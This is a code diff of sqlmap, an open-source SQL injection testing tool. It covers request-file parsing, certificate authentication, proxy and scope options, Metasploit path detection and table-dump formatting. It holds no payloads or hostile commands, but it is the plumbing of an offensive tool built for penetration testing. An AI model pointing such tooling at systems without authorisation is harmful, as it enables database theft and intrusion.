+                                if tbl in printDbs[db]:
+                                    printDbs[db][tbl][col] = dataType
+                                else:
+                                    printDbs[db][tbl] = { col: dataType }
+                            else:
+                                printDbs[db] = {}
+                                printDbs[db][tbl] = { col: dataType }
+
+                            continue
+
+            self.dbTableColumns(printDbs)
 
     def dbTables(self, dbTables):
         if not isinstance(dbTables, dict):
@@ -165,7 +186,6 @@ class Dump:
 
             self.__write("+%s+\n" % lines)
 
-
     def dbTableColumns(self, tableColumns):
         for db, tables in tableColumns.items():
             if not db:
@@ -181,11 +201,15 @@ class Dump:
                 for column in colList:
                     colType = columns[column]
                     maxlength1 = max(maxlength1, len(column))
+
+                    if colType is not None:
                         maxlength2 = max(maxlength2, len(colType))
 
                 maxlength1 = max(maxlength1, len("COLUMN"))
-                maxlength2 = max(maxlength2, len("TYPE"))
                 lines1 = "-" * (int(maxlength1) + 2)
+
+                if colType is not None:
+                    maxlength2 = max(maxlength2, len("TYPE"))
                     lines2 = "-" * (int(maxlength2) + 2)
 
                 self.__write("Database: %s\nTable: %s" % (db, table))
@@ -195,24 +219,42 @@ class Dump:
                 else:
                     self.__write("[%d columns]" % len(columns))
 
+                if colType is not None:
                     self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("+%s+" % lines1)
 
                 blank1 = " " * (maxlength1 - len("COLUMN"))
+
+                if colType is not None:
                     blank2 = " " * (maxlength2 - len("TYPE"))
 
+                if colType is not None:
                     self.__write("| Column%s | Type%s |" % (blank1, blank2))
                     self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("| Column%s |" % blank1)
+                    self.__write("+%s+" % lines1)
 
                 for column in colList:
                     colType = columns[column]
                     blank1 = " " * (maxlength1 - len(column))
+
+                    if colType is not None:
                         blank2 = " " * (maxlength2 - len(colType))
                         self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
+                    else:
+                        self.__write("| %s%s |" % (column, blank1))
 
+                if colType is not None:
                     self.__write("+%s+%s+\n" % (lines1, lines2))
-
+                else:
+                    self.__write("+%s+\n" % lines1)
 
     def dbTableValues(self, tableValues):
+        if tableValues is None:
+            return
+
         db = tableValues["__infos__"]["db"]
         if not db:
             db = "All"
@@ -260,9 +302,9 @@ class Dump:
                 self.__write("| %s%s" % (column, blank), n=False)
 
                 if not conf.multipleTargets and field == fields:
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
+                    dataToDumpFile(dumpFP, "%s" % column)
                 elif not conf.multipleTargets:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                    dataToDumpFile(dumpFP, "%s," % column)
 
                 field += 1
 
@@ -306,7 +348,6 @@ class Dump:
 
             logger.info("Table '%s.%s' dumped to CSV file '%s'" % (db, table, dumpFileName))
 
-
 # object to manage how to print the retrieved queries output to
 # standard output and sessions file
 dumper = Dump()

lib/core/exception.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.settings import PLATFORM
 from lib.core.settings import PYVERSION
 from lib.core.settings import VERSION
@@ -33,67 +31,51 @@ from lib.core.settings import VERSION_STRING
 class sqlmapConnectionException(Exception):
     pass
 
-
 class sqlmapDataException(Exception):
     pass
 
-
 class sqlmapFilePathException(Exception):
     pass
 
-
 class sqlmapGenericException(Exception):
     pass
 
-
 class sqlmapMissingDependence(Exception):
     pass
 
-
 class sqlmapMissingMandatoryOptionException(Exception):
     pass
 
-
 class sqlmapMissingPrivileges(Exception):
     pass
 
-
 class sqlmapNoneDataException(Exception):
     pass
 
-
 class sqlmapNotVulnerableException(Exception):
     pass
 
-
 class sqlmapRegExprException(Exception):
     pass
 
-
 class sqlmapSyntaxException(Exception):
     pass
 
-
 class sqlmapThreadException(Exception):
     pass
 
-
 class sqlmapUndefinedMethod(Exception):
     pass
 
-
 class sqlmapUnsupportedDBMSException(Exception):
     pass
 
-
 class sqlmapUnsupportedFeatureException(Exception):
     pass
 
-
 class sqlmapValueException(Exception):
     pass
 
-
 def unhandledException():
     errMsg  = "unhandled exception in %s, please copy " % VERSION_STRING
     errMsg += "the command line and the following text and send by e-mail "
@@ -103,7 +85,6 @@ def unhandledException():
     errMsg += "Operating system: %s" % PLATFORM
     return errMsg
 
-
 exceptionsTuple = (
                     sqlmapConnectionException,
                     sqlmapDataException,

lib/core/option.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import cookielib
 import ctypes
 import difflib
@@ -37,6 +35,8 @@ import urlparse
 from ConfigParser import ConfigParser
 
 from lib.core.common import getFileType
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
@@ -68,13 +68,12 @@ from lib.core.update import update
 from lib.parse.configfile import configFileParser
 from lib.parse.queriesfile import queriesParser
 from lib.request.proxy import ProxyHTTPSHandler
+from lib.request.certhandler import HTTPSCertAuthHandler
 from lib.utils.google import Google
 
-
 authHandler  = urllib2.BaseHandler()
 proxyHandler = urllib2.BaseHandler()
 
-
 def __urllib2Opener():
     """
     This function creates the urllib2 OpenerDirector.
@@ -86,12 +85,14 @@ def __urllib2Opener():
     debugMsg = "creating HTTP requests opener object"
     logger.debug(debugMsg)
     
+    if conf.dropSetCookie:
+        opener  = urllib2.build_opener(proxyHandler, authHandler)
+    else:
         conf.cj = cookielib.LWPCookieJar()
         opener  = urllib2.build_opener(proxyHandler, authHandler, urllib2.HTTPCookieProcessor(conf.cj))
 
     urllib2.install_opener(opener)
 
-
 def __feedTargetsDict(reqFile, addedTargetUrls):
     fp = open(reqFile, "r")
 
@@ -103,6 +104,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
     port   = None
     scheme = None
 
+    if conf.scope:
+        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
+
     for request in reqResList:
         if scheme is None:
             schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
@@ -163,6 +167,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
                 data   = line
                 params = True
 
+        if conf.scope:
+            getPostReq &= re.search(conf.scope, host) is not None
+
         if getPostReq and params:
             if not url.startswith("http"):
                 url    = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
@@ -173,7 +180,6 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
                 kb.targetUrls.add(( url, method, data, cookie ))
                 addedTargetUrls.add(url)
 
-
 def __setMultipleTargets():
     """
     Define a configuration parameter if we are running in multiple target
@@ -218,7 +224,6 @@ def __setMultipleTargets():
         infoMsg += "testable requests from the targets list"
         logger.info(infoMsg)
 
-
 def __setGoogleDorking():
     """
     This function checks if the way to request testable hosts is through
@@ -266,6 +271,108 @@ def __setGoogleDorking():
         errMsg += "have GET parameters to test for SQL injection"
         raise sqlmapGenericException, errMsg
 
+def __setRequestFromFile():
+    """
+    This function checks if the way to make a HTTP request is through supplied
+    textual file, parses it and saves the information into the knowledge base.
+    """
+
+    if not conf.requestFile:
+        return
+    
+    conf.requestFile = os.path.expanduser(conf.requestFile)
+    
+    infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+    logger.info(infoMsg)
+
+    if not os.path.isfile(conf.requestFile):
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' does not exist" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    fp = open(conf.requestFile, "r")
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+    fp.close()
+    
+    lines = fread.split("\n")
+    
+    if len(lines) == 0:
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' has no content" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    if not (lines[0].upper().startswith("GET ") or lines[0].upper().startswith("POST ")):
+        errMsg =  "the specified HTTP request file "
+        errMsg += "doesn't start with GET or POST keyword"
+        raise sqlmapFilePathException, errMsg
+
+    
+    if lines[0].upper().startswith("GET "):
+        index = 4
+    else:
+        index = 5
+
+    if lines[0].upper().find(" HTTP/") == -1:
+        errMsg  = "the specified HTTP request file " 
+        errMsg += "has a syntax error at line: 1"
+        raise sqlmapFilePathException, errMsg
+        
+    host = None
+    headers = ""
+    page = lines[0][index:lines[0].index(" HTTP/")]
+    
+    if conf.method:
+        warnMsg  = "HTTP method previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.method = lines[0][:index-1]
+
+    for index in xrange(1, len(lines) - 1):
+        line = lines[index]
+        valid = True
+        
+        if len(line) == 0:
+            break
+        
+        headers += line + "\n"
+        
+        items = line.split(': ')
+        if len(items) != 2:
+            valid = False
+        else:
+            if items[0].upper() == "HOST":
+                host = items[1]
+                
+        if not valid:
+            errMsg  = "the specified HTTP request file" 
+            errMsg += "has a syntax error at line: %d" % (index + 1)
+            raise sqlmapFilePathException, errMsg
+    
+    if conf.headers and headers:
+        warnMsg  = "HTTP headers previously set. overriding it with "
+        warnMsg += "the value(s) supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.headers = headers.strip("\n")
+    
+    if fread.find("\n\n") != -1:
+        if conf.data:
+            warnMsg  = "HTTP POST data previously set. overriding it with "
+            warnMsg += "the value supplied from the HTTP request file"
+            logger.warn(warnMsg)
+        conf.data = fread[fread.index('\n\n')+2:].strip("\n")
+    
+    if conf.url:
+        warnMsg  = "target url previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+        
+    if host:
+        conf.url = "%s%s" % (host, page)
+    else:
+        errMsg  = "mandatory HTTP header HOST is missing in "
+        errMsg += "the HTTP request file"
+        raise sqlmapFilePathException, errMsg
             
 def __setMetasploit():
     if not conf.osPwn and not conf.osSmb and not conf.osBof:
@@ -276,7 +383,7 @@ def __setMetasploit():
 
     msfEnvPathExists = False
 
-    if IS_WIN is True:
+    if IS_WIN:
         warnMsg  = "Metasploit's msfconsole and msfcli are not supported "
         warnMsg += "on the native Windows Ruby interpreter. Please "
         warnMsg += "install Metasploit, Python interpreter and sqlmap on "
@@ -300,7 +407,7 @@ def __setMetasploit():
             if isinstance(isAdmin, (int, float, long)) and isAdmin == 0:
                 isAdmin = True
 
-        elif IS_WIN is True:
+        elif IS_WIN:
             isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
 
             if isinstance(isAdmin, (int, float, long)) and isAdmin == 1:
@@ -324,11 +431,11 @@ def __setMetasploit():
             raise sqlmapMissingPrivileges, errMsg
 
     if conf.msfPath:
-        condition  = os.path.exists(os.path.normpath(conf.msfPath))
+        condition  = os.path.exists(normalizePath(conf.msfPath))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfcli")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfcli")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfconsole")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfconsole")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfencode")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfencode")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfpayload")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfpayload")))
 
         if condition:
             debugMsg  = "provided Metasploit Framework 3 path "
@@ -349,25 +456,25 @@ def __setMetasploit():
         warnMsg += "Framework 3 is installed"
         logger.warn(warnMsg)
 
-    if msfEnvPathExists != True:
+    if not msfEnvPathExists:
         warnMsg  = "sqlmap is going to look for Metasploit Framework 3 "
         warnMsg += "installation into the environment paths"
         logger.warn(warnMsg)
 
         envPaths = os.environ["PATH"]
 
-        if IS_WIN is True:
+        if IS_WIN:
             envPaths = envPaths.split(";")
         else:
             envPaths = envPaths.split(":")
 
         for envPath in envPaths:
             envPath    = envPath.replace(";", "")
-            condition  = os.path.exists(os.path.normpath(envPath))
+            condition  = os.path.exists(normalizePath(envPath))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfcli")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfconsole")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfencode")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfpayload")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
 
             if condition:
                 infoMsg  = "Metasploit Framework 3 has been found "
@@ -379,12 +486,11 @@ def __setMetasploit():
 
                 break
 
-    if msfEnvPathExists != True:
+    if not msfEnvPathExists:
         errMsg  = "unable to locate Metasploit Framework 3 installation. "
         errMsg += "Get it from http://metasploit.com/framework/download/"
         raise sqlmapFilePathException, errMsg
 
-
 def __setWriteFile():
     if not conf.wFile:
         return
@@ -403,9 +509,8 @@ def __setWriteFile():
 
     conf.wFileType = getFileType(conf.wFile)
 
-
 def __setUnionTech():
-    if conf.uTech == None:
+    if conf.uTech is None:
         conf.uTech = "NULL"
 
         return
@@ -428,7 +533,6 @@ def __setUnionTech():
         debugMsg += "'%s'" % uTechOriginal
         logger.debug(debugMsg)
 
-
 def __setOS():
     """
     Force the back-end DBMS operating system option.
@@ -451,7 +555,6 @@ def __setOS():
         errMsg += "you."
         raise sqlmapUnsupportedDBMSException, errMsg
 
-
 def __setDBMS():
     """
     Force the back-end DBMS option.
@@ -482,12 +585,10 @@ def __setDBMS():
         errMsg += "fingerprint it for you."
         raise sqlmapUnsupportedDBMSException, errMsg
 
-
 def __setThreads():
     if not isinstance(conf.threads, int) or conf.threads <= 0:
         conf.threads = 1
 
-
 def __setHTTPProxy():
     """
     Check and set the HTTP proxy to pass by all HTTP requests.
@@ -496,6 +597,8 @@ def __setHTTPProxy():
     global proxyHandler
 
     if not conf.proxy: 
+        if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
+            proxyHandler = urllib2.ProxyHandler({})
         return
 
     debugMsg = "setting the HTTP proxy to pass by all HTTP requests"
@@ -509,7 +612,10 @@ def __setHTTPProxy():
     __port         = None
 
     if len(__hostnamePort) == 2:
+        try:
             __port = int(__hostnamePort[1])
+        except:
+            pass #drops into the next check block
 
     if not __scheme or not __hostname or not __port:
         errMsg = "proxy value must be in format 'http://url:port'"
@@ -526,16 +632,16 @@ def __setHTTPProxy():
     else:
         proxyHandler = urllib2.ProxyHandler({"http": __proxyString})
 
-
 def __setHTTPAuthentication():
     """
-    Check and set the HTTP authentication method (Basic, Digest or NTLM),
+    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate),
-    username and password to perform HTTP requests with.
+    username and password for first three methods, or key file and certification file for
+    certificate authentication
     """
 
     global authHandler
 
-    if not conf.aType and not conf.aCred:
+    if not conf.aType and not conf.aCred and not conf.aCert:
         return
 
     elif conf.aType and not conf.aCred:
@@ -548,6 +654,7 @@ def __setHTTPAuthentication():
         errMsg += "but did not provide the type"
         raise sqlmapSyntaxException, errMsg
 
+    if not conf.aCert:
         debugMsg = "setting the HTTP authentication type and credentials"
         logger.debug(debugMsg)
     
@@ -587,7 +694,27 @@ def __setHTTPAuthentication():
                 raise sqlmapMissingDependence, errMsg
     
             authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passwordMgr)
+    else:
+        debugMsg = "setting the HTTP(s) authentication certificate"
+        logger.debug(debugMsg)
         
+        aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert)
+    
+        if not aCertRegExp:
+            errMsg  = "HTTP authentication certificate option "
+            errMsg += "must be in format key_file,cert_file"
+            raise sqlmapSyntaxException, errMsg
+    
+        #os.path.expanduser for support of paths with ~
+        key_file = os.path.expanduser(aCertRegExp.group(1))
+        cert_file = os.path.expanduser(aCertRegExp.group(2))
+        
+        for file in (key_file, cert_file):
+            if not os.path.exists(file):
+                errMsg  = "File '%s' doesn't exist" % file
+                raise sqlmapSyntaxException, errMsg
+        
+        authHandler = HTTPSCertAuthHandler(key_file, cert_file)
 
 def __setHTTPMethod():
     """
@@ -610,7 +737,6 @@ def __setHTTPMethod():
     debugMsg = "setting the HTTP method to %s" % conf.method
     logger.debug(debugMsg)
 
-
 def __setHTTPExtraHeaders():
     if conf.hostname:
         conf.httpHeaders.append(("Host", conf.hostname))
@@ -632,7 +758,6 @@ def __setHTTPExtraHeaders():
         conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
         conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
 
-
 def __defaultHTTPUserAgent():
     """
     @return: default sqlmap HTTP User-Agent header
@@ -648,7 +773,6 @@ def __defaultHTTPUserAgent():
     # updated at March 2009
     #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
 
-
 def __setHTTPUserAgent():
     """
     Set the HTTP User-Agent header.
@@ -712,7 +836,6 @@ def __setHTTPUserAgent():
     logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
     logger.info(logMsg)
 
-
 def __setHTTPReferer():
     """
     Set the HTTP Referer
@@ -724,7 +847,6 @@ def __setHTTPReferer():
 
         conf.httpHeaders.append(("Referer", conf.referer))
 
-
 def __setHTTPCookies():
     """
     Set the HTTP Cookie header
@@ -737,7 +859,6 @@ def __setHTTPCookies():
         conf.httpHeaders.append(("Connection", "Keep-Alive"))
         conf.httpHeaders.append(("Cookie", conf.cookie))
 
-
 def __setHTTPTimeout():
     """
     Set the HTTP timeout
@@ -760,7 +881,6 @@ def __setHTTPTimeout():
 
     socket.setdefaulttimeout(conf.timeout)
 
-
 def __cleanupOptions():
     """
     Cleanup configuration attributes.
@@ -791,24 +911,23 @@ def __cleanupOptions():
         conf.delay = float(conf.delay)
 
     if conf.rFile:
-        conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
+        conf.rFile = normalizePath(ntToPosixSlashes(conf.rFile))
 
     if conf.wFile:
-        conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
+        conf.wFile = normalizePath(ntToPosixSlashes(conf.wFile))
 
     if conf.dFile:
-        conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
+        conf.dFile = normalizePath(ntToPosixSlashes(conf.dFile))
 
     if conf.msfPath:
-        conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
+        conf.msfPath = normalizePath(ntToPosixSlashes(conf.msfPath))
 
     if conf.tmpPath:
-        conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
+        conf.tmpPath = normalizePath(ntToPosixSlashes(conf.tmpPath))
 
     if conf.googleDork or conf.list:
         conf.multipleTargets = True
 
-
 def __setConfAttributes():
     """
     This function set some needed attributes into the configuration
@@ -834,16 +953,18 @@ def __setConfAttributes():
     conf.paramNegative   = False
     conf.path            = None
     conf.port            = None
+    conf.progressWidth   = 54
     conf.retriesCount    = 0
     conf.scheme          = None
     #conf.seqMatcher      = difflib.SequenceMatcher(lambda x: x in " \t")
     conf.seqMatcher      = difflib.SequenceMatcher(None)
+    conf.seqLock         = None
     conf.sessionFP       = None
     conf.start           = True
+    conf.threadContinue  = True
     conf.threadException = False
     conf.wFileType       = None
 
-
 def __setKnowledgeBaseAttributes():
     """
     This function set some needed attributes into the knowledge base
@@ -862,7 +983,7 @@ def __setKnowledgeBaseAttributes():
     kb.dbmsDetected   = False
 
     # Active (extensive) back-end DBMS fingerprint
-    kb.dbmsVersion    = []
+    kb.dbmsVersion    = [ "Unknown" ]
 
     kb.dep            = None
     kb.docRoot        = None
@@ -888,7 +1009,6 @@ def __setKnowledgeBaseAttributes():
     kb.unionCount     = None
     kb.unionPosition  = None
 
-
 def __saveCmdline():
     """
     Saves the command line options on a sqlmap configuration INI file
@@ -918,7 +1038,7 @@ def __saveCmdline():
         optionData.sort()
 
         for option, value, datatype in optionData:
-            if value == None:
+            if value is None:
                 if datatype == "boolean":
                     value = "False"
                 elif datatype in ( "integer", "float" ):
@@ -942,22 +1062,21 @@ def __saveCmdline():
     infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
     logger.info(infoMsg)
 
-
 def __setVerbosity():
     """
     This function set the verbosity of sqlmap output messages.
     """
 
-    if conf.verbose == None:
+    if conf.verbose is None:
         conf.verbose = 1
 
     conf.verbose = int(conf.verbose)
 
     if conf.verbose == 1:
         logger.setLevel(logging.INFO)
-    elif conf.verbose > 1 and conf.eta:
+    elif conf.verbose > 2 and conf.eta:
-        conf.verbose = 1
+        conf.verbose = 2
-        logger.setLevel(logging.INFO)
+        logger.setLevel(logging.DEBUG)
     elif conf.verbose == 2:
         logger.setLevel(logging.DEBUG)
     elif conf.verbose == 3:
@@ -965,7 +1084,6 @@ def __setVerbosity():
     elif conf.verbose >= 4:
         logger.setLevel(8)
 
-
 def __mergeOptions(inputOptions):
     """
     Merge command line options with configuration file options.
@@ -983,10 +1101,9 @@ def __mergeOptions(inputOptions):
         inputOptionsItems = inputOptions.__dict__.items()
 
     for key, value in inputOptionsItems:
-        if not conf.has_key(key) or conf[key] == None or value != None:
+        if not conf.has_key(key) or conf[key] is None or value is not None:
             conf[key] = value
 
-
 def init(inputOptions=advancedDict()):
     """
     Set attributes into both configuration and knowledge base singletons
@@ -1000,6 +1117,8 @@ def init(inputOptions=advancedDict()):
     __setKnowledgeBaseAttributes()
     __cleanupOptions()
 
+    __setRequestFromFile()
+    
     parseTargetUrl()
 
     __setHTTPTimeout()

lib/core/optiondict.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,30 +22,36 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 optDict = {
             # Family:        { "parameter_name":    "parameter_datatype" },
             "Target":        {
                                "url":               "string",
                                "list":              "string",
-                               "googleDork":        "string"
+                               "requestFile":       "string",
+                               "googleDork":        "string",
+                               "configFile":        "string"
                              },
 
             "Request":       {
                                "method":            "string",
                                "data":              "string",
                                "cookie":            "string",
+                               "cookieUrlencode":   "boolean",
+                               "dropSetCookie":     "boolean",
                                "referer":           "string",
                                "agent":             "string",
                                "userAgentsFile":    "string",
                                "headers":           "string",
                                "aType":             "string",
                                "aCred":             "string",
+                               "aCert":             "string",
                                "proxy":             "string",
+                               "ignoreProxy":       "boolean",
                                "threads":           "integer",
                                "delay":             "float",
-                               "timeout":           "float"
+                               "timeout":           "float",
+                               "retries":           "integer",
+                               "scope":             "string"
                              },
 
             "Injection":     {
@@ -57,12 +63,13 @@ optDict = {
                                "string":            "string",
                                "regexp":            "string",
                                "eString":           "string",
-                               "eRegexp":           "string"
+                               "eRegexp":           "string",
                              },
 
             "Techniques":    {
                                "stackedTest":       "boolean",
                                "timeTest":          "boolean",
+                               "timeSec":           "integer",
                                "unionTest":         "boolean",
                                "uTech":             "string",
                                "unionUse":          "boolean"
@@ -131,11 +138,13 @@ optDict = {
                              },
 
             "Miscellaneous": {
-                               "eta":               "boolean",
-                               "verbose":           "integer",
-                               "updateAll":         "boolean",
                                "sessionFile":       "string",
+                               "flushSession":      "boolean",
+                               "eta":               "boolean",
+                               "googlePage":        "integer",
+                               "updateAll":         "boolean",
                                "batch":             "boolean",
-                               "cleanup":           "boolean"
+                               "cleanup":           "boolean",
+                               "verbose":           "integer"
                              },
           }

lib/core/progress.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,27 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.common import dataToStdout
-
+from lib.core.data import conf
 
 class ProgressBar:
     """
     This class defines methods to update and draw a progress bar
     """
 
-    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
+    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
         self.__progBar = "[]"
         self.__oldProgBar = ""
         self.__min = int(minValue)
         self.__max = int(maxValue)
         self.__span = self.__max - self.__min
-        self.__width = totalWidth
+        self.__width = totalWidth if totalWidth else conf.progressWidth
         self.__amount = 0
         self.update()
 
-
     def __convertSeconds(self, value):
         seconds = value
         minutes = seconds / 60
@@ -50,7 +47,6 @@ class ProgressBar:
 
         return "%.2d:%.2d" % (minutes, seconds)
 
-
     def update(self, newAmount=0):
         """
         This method updates the progress bar
@@ -87,7 +83,6 @@ class ProgressBar:
         percentString = str(percentDone) + "%"
         self.__progBar = "%s %s" % (percentString, self.__progBar)
 
-
     def draw(self, eta=0):
         """
         This method draws the progress bar if it has changed
@@ -102,7 +97,6 @@ class ProgressBar:
                 blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max)))
                 dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank))
 
-
     def __str__(self):
         """
         This method returns the progress bar string

lib/core/readlineng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,15 +27,12 @@ In addition to normal readline stuff, this module provides haveReadline
 boolean and _outputfile variable used in genutils.
 """
 
-
-
 import sys
 
 from lib.core.data import logger
 from lib.core.settings import IS_WIN
 from lib.core.settings import PLATFORM
 
-
 try:
     from readline import *
     import readline as _rl
@@ -50,7 +47,7 @@ except ImportError:
     except ImportError:    
         haveReadline = False
 
-if IS_WIN is True and haveReadline:
+if IS_WIN and haveReadline:
     try:
         _outputfile=_rl.GetOutputFile()
     except AttributeError:
@@ -79,7 +76,6 @@ if PLATFORM == 'darwin' and haveReadline:
 
         uses_libedit = True
 
-
 # the clear_history() function was only introduced in Python 2.4 and is
 # actually optional in the readline API, so we must explicitly check for its
 # existence.  Some known platforms actually don't have it.  This thread:

lib/core/session.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from lib.core.common import dataToSessionFile
@@ -37,7 +35,6 @@ from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import ORACLE_ALIASES
 
-
 def setString():
     """
     Save string to match in session file.
@@ -51,7 +48,6 @@ def setString():
     if condition:
         dataToSessionFile("[%s][None][None][String][%s]\n" % (conf.url, conf.string))
 
-
 def setRegexp():
     """
     Save regular expression to match in session file.
@@ -65,7 +61,6 @@ def setRegexp():
     if condition:
         dataToSessionFile("[%s][None][None][Regular expression][%s]\n" % (conf.url, conf.regexp))
 
-
 def setMatchRatio():
     condition = (
                   not kb.resumedQueries
@@ -76,7 +71,6 @@ def setMatchRatio():
     if condition:
         dataToSessionFile("[%s][None][None][Match ratio][%s]\n" % (conf.url, conf.matchRatio))
 
-
 def setInjection():
     """
     Save information retrieved about injection place and parameter in the
@@ -100,7 +94,6 @@ def setInjection():
         dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injParameter))
